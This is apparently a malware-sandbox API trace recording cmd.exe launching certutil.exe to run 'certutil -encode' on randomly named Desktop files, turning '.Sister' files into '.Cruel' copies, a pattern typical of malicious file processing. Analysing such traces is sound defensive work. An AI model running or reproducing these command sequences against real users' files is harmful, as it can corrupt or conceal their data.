(_String1="certutil", _String2="ERASE") returned -2 [0203.274] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0203.274] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0203.275] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0203.275] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0203.275] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0203.275] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0203.275] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0203.275] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0203.275] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0203.275] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0203.275] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0203.275] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0203.275] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0203.275] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0203.275] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0203.275] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0203.275] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0203.275] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0203.275] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0203.275] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0203.275] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0203.275] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0203.275] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0203.275] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0203.275] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0203.275] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0203.275] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0203.276] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0203.276] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0203.276] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0203.276] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0203.276] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0203.276] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0203.276] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0203.276] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0203.276] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0203.276] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0203.276] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0203.276] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0203.276] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0203.276] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0203.276] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0203.276] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0203.276] ??_V@YAXPEAX@Z () returned 0x1 [0203.276] GetProcessHeap () returned 0x21ed8c70000 [0203.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d32630 [0203.278] GetProcessHeap () returned 0x21ed8c70000 [0203.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8c7d160 [0203.278] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0203.278] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0203.278] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0203.278] GetProcessHeap () returned 0x21ed8c70000 [0203.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9280080 [0203.282] SetErrorMode (uMode=0x0) returned 0x0 [0203.282] SetErrorMode (uMode=0x1) returned 0x0 [0203.282] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9280090, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0203.282] SetErrorMode (uMode=0x0) returned 0x1 [0203.282] GetProcessHeap () returned 0x21ed8c70000 [0203.282] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9280080, Size=0x52) returned 0x21ed9280080 [0203.282] GetProcessHeap () returned 0x21ed8c70000 [0203.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9280080) returned 0x52 [0203.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0203.283] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8c72720 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c7c5c0 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c5c0, Size=0x1be) returned 0x21ed8c7c5c0 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c5c0) returned 0x1be [0203.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7d210 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d210, Size=0x7e) returned 0x21ed8c7d210 [0203.283] GetProcessHeap () returned 0x21ed8c70000 [0203.283] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d210) returned 0x7e [0203.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.283] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0203.284] GetLastError () returned 0x2 [0203.284] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.284] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0203.288] GetLastError () returned 0x2 [0203.288] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.288] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0203.289] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0203.289] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0203.289] GetLastError () returned 0x2 [0203.289] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd00 [0203.289] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0203.290] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.290] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.290] ??_V@YAXPEAX@Z () returned 0x1 [0203.290] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0203.291] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0203.291] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0203.291] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0203.291] GetProcessHeap () returned 0x21ed8c70000 [0203.291] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.291] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.292] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.293] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.293] GetProcessHeap () returned 0x21ed8c70000 [0203.293] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0203.293] GetProcessHeap () returned 0x21ed8c70000 [0203.293] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c957a0 [0203.293] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0203.295] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0203.296] _get_osfhandle (_FileHandle=0) returned 0x4c [0203.296] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0203.296] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1160, dwThreadId=0x1064)) returned 1 [0204.999] CloseHandle (hObject=0xa4) returned 1 [0204.999] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.999] GetProcessHeap () returned 0x21ed8c70000 [0205.000] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0205.004] GetEnvironmentStringsW () returned 0x21ed8c78810* [0205.004] GetProcessHeap () returned 0x21ed8c70000 [0205.004] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb1a) returned 0x21ed9980080 [0205.004] FreeEnvironmentStringsA (penv="=") returned 1 [0205.009] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0206.603] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0206.603] CloseHandle (hObject=0xa8) returned 1 [0206.604] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0206.604] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.604] GetProcessHeap () returned 0x21ed8c70000 [0206.604] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0206.604] GetEnvironmentStringsW () returned 0x21ed9980080* [0206.604] GetProcessHeap () returned 0x21ed8c70000 [0206.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0206.604] FreeEnvironmentStringsA (penv="=") returned 1 [0206.604] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.604] GetProcessHeap () returned 0x21ed8c70000 [0206.605] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0206.605] GetEnvironmentStringsW () returned 0x21ed9980080* [0206.605] GetProcessHeap () returned 0x21ed8c70000 [0206.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0206.605] FreeEnvironmentStringsA (penv="=") returned 1 [0206.605] GetProcessHeap () returned 0x21ed8c70000 [0206.605] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c957a0) returned 1 [0206.605] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0206.605] ??_V@YAXPEAX@Z () returned 0x1 [0206.605] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="1KOAcYCUfFYg9R3cp_.ods.Sister", cAlternateFileName="")) returned 1 [0206.606] GetProcessHeap () returned 0x21ed8c70000 [0206.606] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d060, Size=0x8e) returned 0x21ed8c7d2a0 [0206.606] GetProcessHeap () returned 0x21ed8c70000 [0206.606] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d2a0) returned 0x8e [0206.606] GetProcessHeap () returned 0x21ed8c70000 [0206.606] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f00 [0206.607] GetProcessHeap () returned 0x21ed8c70000 [0206.607] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f00, Size=0x58) returned 0x21ed8d55f00 [0206.607] GetProcessHeap () returned 0x21ed8c70000 [0206.607] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f00) returned 0x58 [0206.607] GetProcessHeap () returned 0x21ed8c70000 [0206.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f70 [0206.607] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0206.607] GetProcessHeap () returned 0x21ed8c70000 [0206.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cca0 [0206.607] ??_V@YAXPEAX@Z () returned 0x1 [0206.607] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0206.607] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd00 [0206.607] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0206.607] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0206.608] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0206.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa5b79c32, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa5b79c32, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0206.608] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0206.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="1KOAcYCUfFYg9R3cp_.ods.Sister", cAlternateFileName="1KOACY~1.SIS")) returned 0x21ed8c7cd60 [0206.608] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0206.608] _wcsnicmp (_String1="1KOACY~1.SIS", _String2="1KOAcYCUfFYg9R3cp_.ods.Sister", _MaxCount=0x1d) returned 27 [0206.608] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0206.608] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0206.608] GetProcessHeap () returned 0x21ed8c70000 [0206.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bee0 [0206.608] ??_V@YAXPEAX@Z () returned 0x1 [0206.608] ??_V@YAXPEAX@Z () returned 0x1 [0206.608] GetProcessHeap () returned 0x21ed8c70000 [0206.608] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f70, Size=0x250) returned 0x21ed8d55f70 [0206.608] GetProcessHeap () returned 0x21ed8c70000 [0206.608] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f70) returned 0x250 [0206.609] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0206.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.609] GetFileType (hFile=0x50) returned 0x2 [0206.609] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.609] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0206.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.609] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0206.615] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0206.615] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0206.615] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0206.615] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0206.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.615] GetFileType (hFile=0x50) returned 0x2 [0206.615] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.615] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0206.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.615] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0206.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.616] GetFileType (hFile=0x50) returned 0x2 [0206.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.616] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0206.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.616] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d55f10*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d55f10*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0206.616] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\" ") returned 72 [0206.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.617] GetFileType (hFile=0x50) returned 0x2 [0206.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.617] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0206.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.617] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x48, 